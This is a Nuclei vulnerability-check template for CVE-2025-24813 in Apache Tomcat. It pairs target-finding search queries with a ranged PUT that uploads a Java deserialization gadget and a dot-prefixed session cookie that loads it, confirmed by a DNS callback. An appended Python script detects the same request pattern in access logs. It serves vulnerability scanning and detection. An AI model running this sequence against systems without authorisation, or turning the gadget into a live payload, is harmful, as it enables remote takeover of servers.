id: CVE-2025-24813

info:
  name: Apache Tomcat Path Equivalence - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,theMiddle
  severity: critical
  description: |
    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  impact: |
    Unauthenticated attackers can exploit path equivalence issues to upload malicious files and execute arbitrary code, leading to complete server compromise and potential data exfiltration.
  remediation: |
    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
  reference:
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
    - http://www.openwall.com/lists/oss-security/2025/03/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
    - https://security.netapp.com/advisory/ntap-20250321-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-24813
    cwe-id: CWE-44,CWE-502
    epss-score: 0.99945
    epss-percentile: 0.99971
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: tomcat
    shodan-query:
      - http.component:"apache tomcat"
      - cpe:"cpe:2.3:a:apache:tomcat"
      - http.html:"apache tomcat"
      - http.html:"jk status manager"
      - http.title:"apache tomcat"
      - product:"tomcat"
    fofa-query:
      - server=="apache tomcat"
      - body="apache tomcat"
      - body="jk status manager"
      - title="apache tomcat"
    google-query:
      - intitle:"apache tomcat"
      - site:*/examples/jsp/snp/snoop.jsp
  tags: cve,cve2025,apache,tomcat,rce,intrusive,kev,vkev,vuln

flow: http(1) && http(2)

variables:
  filename: "{{randbase(6)}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: header
        words:
          - "Apache"
        internal: true

  - raw:
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=.{{filename}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 201
# digest: 4a0a0047304502210096e00f825d32c598c50fca22f7c7203486d5d8fa1d3a7e6da2e569599d19fb38022033a449fa7358a6f276cca500ba3fcf8ce5a4579efb4cdb0023780fd759495f1f:922c64590222798bb761d5b6d8e72950
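
A log-side check for the two-request sequence this template sends (a ranged PUT to a `.session` path answered with 201, then a request whose JSESSIONID begins with a dot), added here as an example and not part of the template or the nuclei project. It assumes a Tomcat AccessLogValve pattern extended with `%{Content-Range}i` and `%{JSESSIONID}c`; the function name, finding labels and log lines are constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Assumed AccessLogValve pattern (an assumption, not taken from the template):
#   %h %l %u %t "%r" %s %b "%{Content-Range}i" "%{JSESSIONID}c"
LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<crange>[^"]*)" "(?P<sid>[^"]*)"$'
)

# Constructed sample lines for illustration; not captured traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 11230 "-" "-"
198.51.100.7 - - [10/Mar/2025:10:00:02 +0000] "PUT /qwerty.session HTTP/1.1" 201 - "bytes 0-452/457" "-"
198.51.100.7 - - [10/Mar/2025:10:00:03 +0000] "GET /qwerty HTTP/1.1" 500 1021 "-" ".qwerty"
203.0.113.9 - - [10/Mar/2025:10:05:00 +0000] "PUT /docs/report.pdf HTTP/1.1" 201 - "-" "-"
203.0.113.9 - - [10/Mar/2025:10:05:09 +0000] "GET /app/home HTTP/1.1" 200 5120 "-" "9F2C4E6A8B0D1F3A5C7E9B1D3F5A7C9E"
"""

def detect(log_text):
    """Return findings as (kind, host, timestamp, detail) tuples."""
    staged = {}      # session-file stem -> host that wrote it
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # line does not follow the assumed pattern
        host, ts, sid = m["host"], m["ts"], m["sid"]
        path = PurePosixPath(m["path"].split("?", 1)[0])
        # First request of the template: ranged PUT of a *.session file.
        # 201 is what the template matches; 204 (overwrite) is an added assumption.
        if (m["method"] == "PUT" and path.suffix == ".session"
                and m["crange"] not in ("", "-") and m["status"] in ("201", "204")):
            staged[path.stem] = host
            findings.append(("partial-put-session", host, ts, str(path)))
        # Second request: session id with a leading dot; correlate with a staged file.
        if sid.startswith("."):
            kind = "staged-session-load" if sid[1:] in staged else "dot-session-id"
            findings.append((kind, host, ts, sid))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

Default access log patterns record neither the Content-Range header nor cookie values, so without the extended pattern only the PUT to a `.session` path is visible.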